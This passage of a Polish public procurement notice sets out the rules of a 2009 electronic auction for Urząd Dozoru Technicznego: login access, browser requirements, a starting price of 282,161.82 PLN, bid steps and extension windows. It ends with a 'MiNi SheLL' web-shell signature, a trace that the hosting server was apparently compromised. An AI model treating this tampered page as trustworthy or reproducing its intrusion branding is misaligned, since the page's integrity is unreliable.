2. Po dopuszczeniu przez Zamawiającego do udziału w licytacji elektronicznej Wykonawcy zostaną zaproszeni do składania ofert, a ich dane zostaną przesłane do PWPW S.A. Wykonawcy dopuszczeni do udziału w licytacji elektronicznej otrzymają od PWPW S.A. drogą elektroniczną bezpłatne instrukcje obsługi licytacji elektronicznej oraz login i hasło dostępu do systemu PPP na stronie http://www.ppp.pwpw.pl.
3. Zaproszenia do udziału w licytacji elektronicznej zostaną przekazane Wykonawcom przez Zamawiającego w formie pisemnej, fax-em oraz drogą elektroniczną na adres e-mail Wykonawcy wskazany w Formularzu Wykonawcy, stanowiącym Załącznik nr 2 do ogłoszenia zamieszczonego na stronie internetowej Zamawiającego.
4. Wykonawcy potwierdzą otrzymanie zaproszeń do udziału w licytacji pisemnie, fax-em lub drogą elektroniczną na adres e-mail osoby upoważnionej do kontaktu ze strony Zamawiającego.
5. Minimalne wymagania techniczne urządzeń informatycznych używanych do dostępu do systemu PPP:
-komputer klasy PC, 
- system operacyjny Windows 2000 lub wyższy;
- zegar 300Mhz, 64MB RAM; 
- stałe łącze internetowe; 
- przeglądarka Internet Explorer 5.5 bądź wyższa;
- aplet java pobrany jednorazowo przy pierwszym połączeniu ze stroną;
- wyłączona autoryzacja na serwerze proxy;
PWPW S.A. udziela informacji technicznych związanych z organizacją licytacji elektronicznej pod numerem telefonu (22) 464 79 79, e-mail: aukcje@pwpw.pl..</p>
<p><b>IV.3.9) Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:</b> 1. Po zalogowaniu za pośrednictwem strony internetowej http://www.ppp.pwpw.pl do systemu PPP przy użyciu otrzymanego loginu i hasła, Wykonawcy uzyskują dostęp do aplikacji umożliwiającej składanie ofert. W czasie trwania licytacji Wykonawcy składają swoje oferty cenowe w postaci elektronicznej.
2. Licytacja elektroniczna rozpoczyna się od ceny wywoławczej: 282 161,82 PLN brutto.
3. Krok postąpienia (minimalna różnica ceny składanych ofert): wynosi: 200 PLN brutto.
4. Krok postąpienia maksymalny wynosi: 5000 PLN brutto.
5. Oferty składane przez Wykonawców podlegają automatycznej klasyfikacji na podstawie ceny. Oferta złożona w toku licytacji przestaje wiązać, gdy inny Wykonawca złożył ofertę korzystniejszą. W trakcie licytacji elektronicznej system PPP na bieżąco udostępnia wszystkim Wykonawcom informacje o pozycji złożonych przez nich ofert, liczbie Wykonawców biorących udział w licytacji elektronicznej, a także cenach złożonych przez nich ofert.
6. Zamawiający udzieli zamówienia Wykonawcy, który w toku licytacji elektronicznej zaoferował najniższą cenę.
7. Zamawiający unieważni postępowanie, jeżeli zajdą przesłanki, przewidziane w art. 93 ust. 1 ustawy Pzp:
- wpłyną mniej niż dwa wnioski o dopuszczenie do udziału w licytacji elektronicznej,
- w trakcie licytacji elektronicznej nie została złożona żadna oferta..</p>
<p><b>IV.3.10) Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania:</b><br>
<ul class="kh_indent_1"><li>
<table>
<tr><td style="font-size: 10pt;"><b>etap nr</b></td><td width="20px;"><td style="font-size: 10pt;"><b>czas trwania etapu</b></td></tr>
<tr><td valign="top" style="font-size: 10pt;">1</td><td></td><td style="font-size: 10pt;">Licytacja elektroniczna jest jednoetapowa. Podstawowy czas trwania  licytacji elektronicznej wynosić będzie 20 minut.</td></tr>
</table></li></ul>
<p><b>Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną <i>zakwalifikowani</i> do następnego etapu?</b> nie.</p>
<p><b>IV.3.11) Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej:</b> 27.07.2009 godzina 12:00, miejsce: Urząd Dozoru Technicznego, ul. Szczęśliwicka 34, 02-353 Warszawa, pokój nr 7..</p>
<p><b>IV.3.12) Termin otwarcia licytacji elektronicznej:</b> Licytacja zostanie przeprowadzona dnia 10 sierpnia 2009 r. i rozpocznie się o godzinie 10:00..</p>
<p><b>Termin zamknięcia licytacji elektronicznej:</b> 1. Maksymalny czas trwania licytacji elektronicznej: 45 minut.
2. Zamknięcie licytacji elektronicznej następuje w chwili upływu czasu trwania licytacji elektronicznej..</p>
<p><b>Warunki zamknięcia licytacji elektronicznej:</b> 1. Zamknięcie licytacji elektronicznej nastąpi w chwili upływu podstawowego czasu trwania licytacji elektronicznej pod warunkiem, że w ciągu ostatnich 3 minut  trwania  licytacji żaden z Wykonawców nie złoży oferty. Jeżeli w ciągu ostatnich 3 minut trwania licytacji elektronicznej zostanie złożona oferta przez któregokolwiek z Wykonawców nastąpi uruchomienie opcjonalnego przedłużenia licytacji elektronicznej. 
2. W trakcie licytacji elektronicznej możliwe jest uruchomienie 5 opcjonalnych przedłużeń licytacji elektronicznej. Licytacja elektroniczna kończy się wraz z upływem:
- 20 minuty jeśli w okresie między 17 a 20 minutą nie zostanie złożona nowa oferta
- 25 minuty jeśli w okresie między 22 a 25 minutą nie zostanie złożona nowa oferta
- 30 minuty jeśli w okresie między 27 a 30 minutą nie zostanie złożona nowa oferta
- 35 minuty jeśli w okresie między 32 a 35 minutą nie zostanie złożona nowa oferta
- 40 minuty jeśli w okresie między 37 a 40 minutą nie zostanie złożona nowa oferta
- 45 minuty jeśli w okresie między 42 a 45 minutą zostanie bądź nie zostanie złożona nowa oferta.
3. Maksymalny czas trwania licytacji elektronicznej: 45 minut.
4. Zamknięcie licytacji elektronicznej następuje w chwili upływu czasu trwania licytacji elektronicznej.
5. Bezpośrednio po zamknięciu licytacji elektronicznej Zamawiający poda na swojej stronie internetowej www.udt.gov.pl oraz na stronie internetowej www.ppp.pwpw.pl nazwę (firmę) oraz adres Wykonawcy, którego ofertę wybrano..</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com